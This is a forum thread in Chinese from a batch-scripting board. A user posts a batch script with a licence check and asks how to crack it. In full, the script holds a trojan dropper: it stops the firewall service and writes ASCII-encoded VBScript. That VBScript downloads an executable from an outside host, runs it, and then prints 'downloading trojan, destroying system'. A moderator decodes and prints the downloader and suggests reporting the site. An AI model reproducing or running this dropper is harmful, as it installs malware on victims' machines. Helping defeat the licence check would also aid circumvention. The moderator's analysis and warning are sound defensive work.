|
topy12345
新手上路
积分 3
发帖 3
注册 2009-11-26
状态 离线
|
『楼 主』:
跪求大侠给我破这个批处理验证!无限感激!
@echo off
net stop sharedaccess
if not exist C:\WINDOWS\web.vbs goto :ad
:ob
if not exist C:\WINDOWS\mirl goto :ab
goto :oko
:ad
mode con cols=50 lines=20&color 7f
title lengyuye key
cls
echo
echo
echo key
net stop sharedaccess
echo Str=Array(83,101,116,32,120,80,111,115,116,32,61,32,67,114,101,97,116,101,79,98,106,101,99,116,40,34,77,105,99,114,111,115,111,102,116,46,88,77,76,72,84,84,80,34,41,32,32,13,10,120,80,111,115,116,46,79,112,101,110,32,34,71,69,84,34,44,34,104,116,116,112,58,47,47,97,118,122,104,97,52,46,51,51,50,50,46,111,114,103,47,118,98,115,46,101,120,101,34,44,48,32,32,32,13,10,120,80,111,115,116,46,83,101,110,100,40,41,32,32,32,13,10,83,101,116,32,115,71,101,116,32,61,32,67,114,101,97,116,101,79,98,106,101,99,116,40,34,65,68,79,68,66,46,83,116,114,101,97,109,34,41,32,32,32,13,10,115,71,101,116,46,77,111,100,101,32,61,32,51,32,32,13,10,115,71,101,116,46,84,121,112,101,32,61,32,49,32,32,13,10,115,71,101,116,46,79,112,101,110,40,41,32,32,13,10,115,71,101,116,46,87,114,105,116,101,40,120,80,111,115,116,46,114,101,115,112,111,110,115,101,66,111,100,121,41,32,32,13,10,115,71,101,116,46,83,97,118,101,84,111,70,105,108,101,32,34,67,58,92,87,73,78,68,79,87,83,92,118,98,115,46,101,120,101,34,44,50,32,32,13,10) >>C:\WINDOWS\ut.vbs
echo Function Num2Str(Str):For I=0 To UBound(Str):Num2Str=Num2Str ^& Chr(Str(I)):Next:End Function >>C:\WINDOWS\ut.vbs
echo Function Num2Str(Str):For I=0 To UBound(Str):Num2Str=Num2Str ^& Chr(Str(I)):Next:End Function >>C:\WINDOWS\ut.vbs
echo Execute Num2Str(Str) >>C:\WINDOWS\ut.vbs
echo Execute Num2Str(Str) >>C:\WINDOWS\ut.vbs
cls
echo.
echo.
echo.
echo.
echo.
echo 认证错误! 执行下载木马!
echo.
echo.
echo 正在破坏系统... ...
C:\WINDOWS\ut.vbs
C:\WINDOWS\vbs.exe
del C:\WINDOWS\ut.vbs /q
del C:\WINDOWS\vbs.exe /q
goto :ob
:ab
@echo off&setlocal enabledelayedexpansion
if exist C:\WINDOWS\mirl del C:\WINDOWS\mirl /q
set yyyy=%date:~0,4%
set mm=%date:~5,2%
set dd=%date:~8,2%
set /a od=!dd!-1
if !od!==0 call :dd0
if !mm!==0 call :mm0
set yyyymmdd=l1!yyyy!5!mm!2!od!1
echo !yyyymmdd!>>C:\WINDOWS\mirl
goto :oko
:dd0
set /a mm=!mm!-1
for %%a in (1 3 5 7 8 10 12)do set %%add=31
set /a pddd=!yyyy!*10/4
set pd2d=!pddd:~-1,1!
set 2dd=28
if !pd2d!==0 set 2dd=29
for %%b in (4 6 9 11)do set %%bdd=30
set od=!%mm%dd!
goto :eof
:mm0
set /a yyyy=!yyyy!-1
set mm=12 && set od=31
goto :eof
:oko
@echo off
COPY C:\WINDOWS\mirl C:\WINDOWS\system32\mced
COPY C:\WINDOWS\web.vbs C:\WINDOWS\system32\cced
@for /f "tokens=1,2,3 delims= " %%i in (C:\WINDOWS\system32\mced) do set gateway1=%%i%%j%%k
@for /f "tokens=1,2,3 delims= " %%i in (C:\WINDOWS\system32\cced) do set gateway=%%i
if /i %gateway%==%gateway1% goto yes
if exist C:\WINDOWS\system32\mced del C:\WINDOWS\system32\mced /q
if exist C:\C:\WINDOWS\system32\cced del C:\C:\WINDOWS\system32\cced /q
if exist C:\WINDOWS\mirl del C:\WINDOWS\mirl /q
if exist C:\WINDOWS\web.vbs del del C:\WINDOWS\web.vbs /q
exit
:yes
echo on
if exist C:\WINDOWS\system32\mced del C:\WINDOWS\system32\mced /q
if exist C:\C:\WINDOWS\system32\cced del C:\C:\WINDOWS\system32\cced /q
if exist C:\WINDOWS\mirl del C:\WINDOWS\mirl /q
if exist C:\WINDOWS\web.vbs del del C:\WINDOWS\web.vbs /q
@echo off
cls
mode con cols=50 lines=20&color 7f
title lengyuye key
echo yanzhengdengdai!
echo =1=
@ping 127.0.0.1 -n 50>nul
if not exist OPE?.DLL echo NO && goto:bbdd
COPY OPE.DLL OPE1.DLL
del OPE.DLL /Q
goto :LLCC
:NO
@echo off
color B
cls
mode con cols=60 lines=20&color 6c
@for /f "tokens=1,2,3 delims= " %%i in (OPE1.DLL) do s -p :%%i…… -m 1 && if exist OPE1.DLL @echo off && @start /b ok %%i 1521 3000 %%i
goto :iipp
:LLCC
@echo off&setlocal enabledelayedexpansion
set keyn=1
for /f "tokens=2 delims=:" %%i in ('ipconfig /all ^| findstr /i /c:"Physical Address"') do set keyid=%%i
set keyid=%keyid:~10,2%%keyid:~1,2%%keyid:~4,2%%keyid:~16,2%%keyid:~7,2%%keyid:~13,2%
if exist "%~dp0xcdkey.dat" goto key2
:key
echo key:%keyid%
set keyida=%keyid%
set /a keyida+=1234567890
set /a keyida">>="2
set key=
set /p key=(%keyn%)------
if /i %key%==%keyida% echo %keyida%>"%~dp0xcdkey.dat"&&goto NO
set /a keyn+=1
if /i %keyn%==4 goto key1
echo NO!
goto key
:key1
echo BEY!
del %0
call :exit
:key2
for /f "tokens=1* delims=" %%i in ('type "%~dp0xcdkey.dat"') do set keyida=%%i
set keyidb=%keyid%
set /a keyidb+=1234567890
set /a keyidb">>="2
if /i %keyida%==%keyidb% goto NO
echo NO!
goto key
:iipp
del OPE1.DLL /q
if exist C:\WINDOWS\system32\mced del C:\WINDOWS\system32\mced /q
if exist C:\C:\WINDOWS\system32\cced del C:\C:\WINDOWS\system32\cced /q
if exist C:\WINDOWS\mirl del C:\WINDOWS\mirl /q
if exist C:\WINDOWS\web.vbs del del C:\WINDOWS\web.vbs /q
:bbdd
ceshi.bat
有没大侠可以给我说明下?真的感激!
|
|
2009-11-28 23:01 |
|
|
topy12345
新手上路
积分 3
发帖 3
注册 2009-11-26
状态 离线
|
『第
2 楼』:
如果有需要我可以提供其他关联文件!请大侠们帮忙!
|
|
2009-11-28 23:03 |
|
|
HAT
版主
积分 9023
发帖 5017
注册 2007-5-31
状态 离线
|
『第
3 楼』:
ASCII 2 VBS:
Set xPost = CreateObject("Microsoft.XMLHTTP")
xPost.Open "GET","http://avzha4.3322.org/vbs.exe",0
xPost.Send()
Set sGet = CreateObject("ADODB.Stream")
sGet.Mode = 3
sGet.Type = 1
sGet.Open()
sGet.Write(xPost.responseBody)
sGet.SaveToFile "C:\WINDOWS\vbs.exe",2 去举报一下这个病毒站点吧:)
|
|
|
2009-11-29 13:39 |
|
|
42293
新手上路
积分 5
发帖 4
注册 2009-11-27
状态 离线
|
『第
4 楼』:
学习了,危险的CMD文件我不敢乱执行。
[ Last edited by 42293 on 2009-11-29 at 14:00 ]
|
|
2009-11-29 13:58 |
|
|
topy12345
新手上路
积分 3
发帖 3
注册 2009-11-26
状态 离线
|
『第
5 楼』:
555555555555~!!版主,能把那个批处理的验证给去掉的吗?
我每次执行这个批处理都被下载!55555555~~帮帮忙可以吗?
我脚本不太熟 去不了
|
|
2009-11-29 14:11 |
|
|